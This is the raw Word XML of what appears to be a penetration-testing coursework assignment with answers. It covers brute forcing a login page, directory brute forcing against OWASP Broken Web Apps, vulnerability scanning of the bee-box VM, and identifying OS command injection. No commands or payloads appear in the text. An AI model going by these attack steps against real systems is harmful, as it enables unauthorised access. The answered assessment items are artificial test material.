            <w:tcW w:w="8596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FEBF585" w14:textId="77777777" w:rsidR="005D3CF4" w:rsidRDefault="006C6E09" w:rsidP="00EC59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C6E09">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FFF033" wp14:editId="70AEADD7">
                  <wp:extent cx="3055885" cy="88399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88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BE19E" w14:textId="77777777" w:rsidR="006C6E09" w:rsidRDefault="006C6E09" w:rsidP="00EC59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29A210F9" w14:textId="4FA6B2F8" w:rsidR="006C6E09" w:rsidRPr="006C6E09" w:rsidRDefault="006C6E09" w:rsidP="00EC59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ogin.php can be used to log in as a user or admin into the system. By exploiting a weak login page that is vulnerable to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et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ay brute forcing, a hacker might be able to use this page to </w:t>
            </w:r>
            <w:r w:rsidR="00443D77">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">gain unauthorized access into the system. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7210DE03" w14:textId="77777777" w:rsidR="003E3CA2" w:rsidRPr="005D3CF4" w:rsidRDefault="003E3CA2" w:rsidP="005D3CF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6CB189" w14:textId="77777777" w:rsidR="0098198B" w:rsidRPr="002135A4" w:rsidRDefault="0098198B" w:rsidP="0098198B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30 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3C59C" w14:textId="77777777" w:rsidR="0098198B" w:rsidRDefault="0098198B" w:rsidP="009819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620E0CB" w14:textId="77777777" w:rsidR="0098198B" w:rsidRDefault="0098198B" w:rsidP="009819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71F21470" w14:textId="77777777" w:rsidR="0098198B" w:rsidRPr="0098198B" w:rsidRDefault="0098198B" w:rsidP="0098198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E3F72E1" w14:textId="56F5BC8C" w:rsidR="00B406A8" w:rsidRDefault="00B406A8" w:rsidP="00431D23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se an</w:t>
      </w:r>
      <w:r w:rsidR="00ED370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ED370C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">appropriate tool to </w:t>
      </w:r>
      <w:r w:rsidR="00D73946" w:rsidRPr="00596556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">brute force and </w:t>
      </w:r>
      <w:r w:rsidR="00ED370C" w:rsidRPr="00596556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>find the directories and files</w:t>
      </w:r>
      <w:r w:rsidR="00ED370C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00786F5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of any ONE website of your choice running under the OWASP Broken Web Apps (owaspbwa)</w:t>
      </w:r>
      <w:r w:rsidR="000516FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4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EC51E4" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4" w:rsidRPr="00596556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tool’s command and its output</w:t>
      </w:r>
      <w:r w:rsidR="00EC51E4" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008806D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[You may stop the scan halfway in case it is taking longer than usual time to complete].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227915DB" w14:textId="24FBFE4E" w:rsidR="00AD6F5F" w:rsidRDefault="00312644" w:rsidP="0031264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B30E7" w14:paraId="79321EAD" w14:textId="77777777" w:rsidTr="009D106A">
        <w:trPr>
          <w:trHeight w:val="2232"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3B6F84" w14:textId="1F8690A2" w:rsidR="007B30E7" w:rsidRDefault="00A70CFC" w:rsidP="007B30E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70CF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86753EC" wp14:editId="7F0B39A1">
                  <wp:extent cx="4701947" cy="5616427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947" cy="561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7B6D9" w14:textId="77777777" w:rsidR="00312644" w:rsidRPr="00AD6F5F" w:rsidRDefault="00312644" w:rsidP="007B30E7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE44D74" w14:textId="3635E2ED" w:rsidR="007E1090" w:rsidRDefault="00AD3ABA" w:rsidP="00431D23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any </w:t>
      </w:r>
      <w:r w:rsidRPr="001F24CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">automated </w:t>
      </w:r>
      <w:r w:rsidR="00241723" w:rsidRPr="001F24CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>vulnerability scanning tool</w:t>
      </w:r>
      <w:r w:rsidR="00241723">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00435FA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of your choice to either scan for </w:t>
      </w:r>
      <w:r w:rsidR="00E55897">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidR="00273429">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Server </w:t>
      </w:r>
      <w:r w:rsidR="00E55897">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OS or </w:t>
      </w:r>
      <w:r w:rsidR="00273429">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00E55897">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00B25D34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidR="00E55897">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidR="00B25D34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> targeting </w:t>
      </w:r>
      <w:r w:rsidR="00576379">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00576379" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F24CA" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00F16051" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> server running in the </w:t>
      </w:r>
      <w:r w:rsidR="00913C57" w:rsidRPr="001F24CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>bee-box v1.6 VM</w:t>
      </w:r>
      <w:r w:rsidR="00913C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002D4386">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF2828" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00BF2828">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BF2828" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF2828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BF2828" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00BF2828" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">tool’s input parameters and its </w:t>
      </w:r>
      <w:r w:rsidR="00D938D2" w:rsidRPr="00252096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">top </w:t>
      </w:r>
      <w:r w:rsidR="00AA1683" w:rsidRPr="00252096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilities (critical or high or </w:t>
      </w:r>
      <w:r w:rsidR="00252096" w:rsidRPr="00252096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:r w:rsidR="00AA1683" w:rsidRPr="00252096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AA1683" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97FB3" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">that have been </w:t>
      </w:r>
      <w:r w:rsidR="00AA1683" w:rsidRPr="00F16051">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>detected</w:t>
      </w:r>
      <w:r w:rsidR="00BF2828" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BF2828">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[You may stop the scan halfway in case it is taking longer than usual time to complete].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672077A6" w14:textId="2CD95B87" w:rsidR="00F25ACC" w:rsidRDefault="003470B2" w:rsidP="003470B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800BE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167E5" w14:paraId="7B891938" w14:textId="77777777" w:rsidTr="009D106A">
        <w:trPr>
          <w:trHeight w:val="5507"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C662FD" w14:textId="77777777" w:rsidR="00F5275D" w:rsidRDefault="00F5275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1A7BE506" w14:textId="27CB10E3" w:rsidR="00F5275D" w:rsidRDefault="00F5275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F5275D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="345399D9" wp14:editId="0641FB51">
                  <wp:extent cx="5410669" cy="4183743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69" cy="418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01381" w14:textId="5DD0488B" w:rsidR="006167E5" w:rsidRDefault="00B9539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9539F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2581445B" wp14:editId="6B280D61">
                  <wp:extent cx="5732145" cy="3163570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6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F269D" w14:textId="1853676F" w:rsidR="00B04FC9" w:rsidRDefault="00B04FC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69784EC0" w14:textId="2338A1AD" w:rsidR="001F0A3A" w:rsidRPr="00446C57" w:rsidRDefault="001F0A3A" w:rsidP="00446C57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446C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QUESTION 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00446C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00446C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009F5552" w:rsidRPr="00446C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00446C57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199739D" w14:textId="4874B08A" w:rsidR="00CB521F" w:rsidRDefault="00CB521F" w:rsidP="001F0A3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB2DDB4" w14:textId="77777777" w:rsidR="00B00A6B" w:rsidRDefault="00B00A6B" w:rsidP="00B00A6B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3FA58A2E" w14:textId="77777777" w:rsidR="00B00A6B" w:rsidRPr="001F0A3A" w:rsidRDefault="00B00A6B" w:rsidP="001F0A3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6361BC" w14:textId="6DB4EA1E" w:rsidR="00861C7D" w:rsidRDefault="00BB1FA1" w:rsidP="00861C7D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 following questions based on the screenshot shown below</w:t>
      </w:r>
      <w:r w:rsidR="00861C7D" w:rsidRPr="00861C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779526FD" w14:textId="3FC85A78" w:rsidR="009F5552" w:rsidRDefault="009F5552" w:rsidP="009F55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438F61" w14:textId="4569C9A1" w:rsidR="009F5552" w:rsidRDefault="0030794D" w:rsidP="0011739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D6352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7D68125A" wp14:editId="76532073">
            <wp:extent cx="4445000" cy="3042988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29" cy="306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9E63" w14:textId="1AFBC146" w:rsidR="005B31F8" w:rsidRPr="00995600" w:rsidRDefault="005B31F8" w:rsidP="005B31F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95600">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00995600">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00995600">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref516161324 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00995600">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00995600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(a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00995600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: Screenshot of a discovered vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C963179" w14:textId="77777777" w:rsidR="00B84804" w:rsidRDefault="00B84804" w:rsidP="009F555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9CFAE6F" w14:textId="20AB4B74" w:rsidR="009F5552" w:rsidRDefault="00CE2311" w:rsidP="00B84804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bookmarkStart w:id="7" w:name="_Ref516164721"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on </w:t>
      </w:r>
      <w:r w:rsidR="005B31F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00CA7983">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3(a)</w:t>
      </w:r>
      <w:r w:rsidRPr="009956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bove, identify which </w:t>
      </w:r>
      <w:r w:rsidR="002930C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the web app pentester discovered.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00DE3984">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC5263" w14:textId="37F42BDC" w:rsidR="00AA4C13" w:rsidRDefault="00ED6152" w:rsidP="00ED6152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CE231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00A6B" w14:paraId="31905E56" w14:textId="77777777" w:rsidTr="00252AA4">
        <w:trPr>
          <w:trHeight w:val="559"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD4FA3B" w14:textId="70A06C80" w:rsidR="00B00A6B" w:rsidRDefault="00F5275D" w:rsidP="00B00A6B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Hlk119339085"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OS</w:t>
            </w:r>
            <w:r w:rsidR="0090130B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="8"/>
    </w:tbl>
    <w:p w14:paraId="7B4031CB" w14:textId="4EC6C84F" w:rsidR="00ED6152" w:rsidRDefault="00ED6152" w:rsidP="00B00A6B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FF7832F" w14:textId="741C8CC3" w:rsidR="003A5306" w:rsidRDefault="003A5306" w:rsidP="003A5306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y your answer for Q3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516164719 \w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_Ref516164721 \w \h  \* MERGEFORMA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by providing explanation, specifically pertaining to the pentester’s input, how this input was handled by the webpage and the output displayed on the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05708CDA" w14:textId="33AF66FF" w:rsidR="003A5306" w:rsidRDefault="003A5306" w:rsidP="003A5306">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left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D506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647E4" w14:paraId="5716FAEA" w14:textId="77777777" w:rsidTr="003647E4">
        <w:trPr>
          <w:trHeight w:val="2682"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08AA27B9" w14:textId="77777777" w:rsidR="00471235" w:rsidRDefault="00F93468" w:rsidP="004E3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entesters input </w:t>
            </w:r>
            <w:r w:rsidR="0002270F">
